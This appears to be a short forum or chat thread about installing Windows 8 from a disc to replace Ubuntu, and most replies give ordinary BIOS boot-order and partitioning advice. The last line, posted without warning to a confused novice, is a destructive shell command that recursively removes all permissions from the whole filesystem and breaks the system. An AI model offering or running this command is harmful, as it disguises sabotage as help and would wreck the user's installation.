Are you installing WIndows 8 from a CD to replace Ubuntu?

If so, boot from disk.

How in the flying **** do I do that, sir?

Go to your Bios Boot menu, it won't work if you open it in Ubuntu lol.

Are you replacing Ubuntu or are you installing Windows 8.1 in a VM?

If you are trying to replace Ubuntu with Windows, you just need to boot from the disc.

Reboot the computer and enter the BIOS (usually you press DEL or F4 on while booting).

In here, you set the disc drive as the first boot device.

You can't install windows 8 from within ubuntu... you can only use that executable if you have a windows os. If you want to replace ubuntu, boot from the disc and format everything. If you want to keep ubuntu, resize the ext4 partition and install windows 8 in the new parition.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
